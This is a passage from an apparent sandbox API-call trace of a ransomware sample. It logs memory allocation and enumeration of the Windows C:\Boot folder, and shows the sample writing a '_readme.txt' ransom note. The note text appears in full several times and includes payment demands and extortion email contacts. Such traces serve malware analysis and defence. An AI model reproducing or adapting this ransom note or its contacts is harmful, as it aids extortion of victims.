Size=0xc2e) returned 0x325c3b0 [0227.381] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.381] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.381] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed648 | out: hHeap=0x630000) returned 1 [0227.381] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed648 [0227.382] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.382] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.382] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed648 | out: hHeap=0x630000) returned 1 [0227.382] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed648 [0227.382] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.382] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.382] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed648 | out: hHeap=0x630000) returned 1 [0227.382] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed648 [0227.382] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.382] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.382] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed648 | out: hHeap=0x630000) returned 1 [0227.382] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed648 [0227.382] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.382] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.382] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed648 | out: hHeap=0x630000) returned 1 [0227.382] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed648 [0227.382] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.382] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.382] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed648 | out: hHeap=0x630000) returned 1 [0227.382] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed648 [0227.382] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.382] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.382] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed648 | out: hHeap=0x630000) returned 1 [0227.382] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed648 [0227.382] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.382] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.382] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed648 | out: hHeap=0x630000) returned 1 [0227.382] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed648 [0227.382] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.382] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.383] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed648 | out: hHeap=0x630000) returned 1 [0227.383] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed648 [0227.383] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.383] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.383] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed648 | out: hHeap=0x630000) returned 1 [0227.383] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed648 [0227.383] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0227.383] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed648 | out: hHeap=0x630000) returned 1 [0227.383] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0227.383] PathFindFileNameW (pszPath="") returned="" [0227.383] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75000000 [0227.383] GetProcAddress (hModule=0x75000000, lpProcName="SHGetFolderPathW") returned 0x75085708 [0227.384] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x325c3b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0227.384] FreeLibrary (hLibModule=0x75000000) returned 1 [0227.384] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed828 | out: hHeap=0x630000) returned 1 [0227.384] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.384] PathAppendW (in: pszPath="C:\\Boot\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\_readme.txt") returned 1 [0227.384] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.384] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed828 | out: hHeap=0x630000) returned 1 [0227.384] PathFileExistsW (pszPath="C:\\Boot\\_readme.txt") returned 0 [0227.384] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x7d00) returned 0x37b0468 [0227.384] lstrcpyW (in: lpString1=0x37b0468, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd" [0227.384] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd", lpString2="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjdKO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjdKO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" [0227.384] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3c18 [0227.384] CreateFileW (lpFileName="C:\\Boot\\_readme.txt" (normalized: "c:\\boot\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0227.385] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3c18 | out: hHeap=0x630000) returned 1 [0227.385] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b0468 | out: hHeap=0x630000) returned 1 [0227.385] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.385] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed828 [0227.385] FindFirstFileW (in: lpFileName="C:\\Boot\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0227.385] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed828 | out: hHeap=0x630000) returned 1 [0227.385] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0227.385] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac2e8a60, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x90cd45e0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0x90cd45e0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x6000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCD", cAlternateFileName="")) returned 1 [0227.385] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac2e8a60, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac2e8a60, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x9098e7a0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x5400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCD.LOG", cAlternateFileName="")) returned 1 [0227.385] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac30ebc0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCD.LOG1", cAlternateFileName="BCD~1.LOG")) returned 1 [0227.385] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac30ebc0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCD.LOG2", cAlternateFileName="BCD~2.LOG")) returned 1 [0227.385] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BOOTSTAT.DAT", cAlternateFileName="")) returned 1 [0227.385] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac015040, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cs-CZ", cAlternateFileName="")) returned 1 [0227.385] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed828 [0227.385] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed648 [0227.385] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1c) returned 0x31ed7d8 [0227.385] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed8c8 [0227.385] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed648 | out: hHeap=0x630000) returned 1 [0227.385] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed828 | out: hHeap=0x630000) returned 1 [0227.385] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="da-DK", cAlternateFileName="")) returned 1 [0227.385] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed828 [0227.385] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed648 [0227.386] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x38) returned 0x31de170 [0227.386] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed8a0 [0227.386] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed8c8 | out: hHeap=0x630000) returned 1 [0227.386] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed7d8 | out: hHeap=0x630000) returned 1 [0227.386] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed7d8 [0227.386] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed648 | out: hHeap=0x630000) returned 1 [0227.386] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed828 | out: hHeap=0x630000) returned 1 [0227.386] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="de-DE", cAlternateFileName="")) returned 1 [0227.386] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed828 [0227.386] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed648 [0227.386] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x54) returned 0x31d6930 [0227.386] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed8c8 [0227.386] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed878 [0227.386] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed8a0 | out: hHeap=0x630000) returned 1 [0227.386] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed7d8 | out: hHeap=0x630000) returned 1 [0227.386] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31de170 | out: hHeap=0x630000) returned 1 [0227.386] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed7d8 [0227.386] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed648 | out: hHeap=0x630000) returned 1 [0227.386] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="el-GR", cAlternateFileName="")) returned 1 [0227.386] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed828 [0227.386] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed648 [0227.386] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x31b3bf8 [0227.386] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed8a0 [0227.386] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed850 [0227.386] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed7b0 [0227.386] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0227.387] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed828 [0227.387] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed648 [0227.387] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa8) returned 0x31a4610 [0227.387] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed878 [0227.387] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed8c8 [0227.387] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9e0 [0227.387] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31eda08 [0227.387] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="es-ES", cAlternateFileName="")) returned 1 [0227.387] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed828 [0227.387] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed648 [0227.387] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed7b0 [0227.387] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fi-FI", cAlternateFileName="")) returned 1 [0227.387] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed828 [0227.387] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed648 [0227.387] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xfc) returned 0x31a4298 [0227.387] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed850 [0227.387] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed8a0 [0227.387] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31eda30 [0227.387] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31eda58 [0227.387] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31eda80 [0227.387] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31edaa8 [0227.387] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac276640, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Fonts", cAlternateFileName="")) returned 1 [0227.387] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed828 [0227.387] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed648 [0227.387] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed7d8 [0227.387] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fr-FR", cAlternateFileName="")) returned 1 [0227.387] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed828 [0227.387] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed648 [0227.387] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31eda08 [0227.387] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: 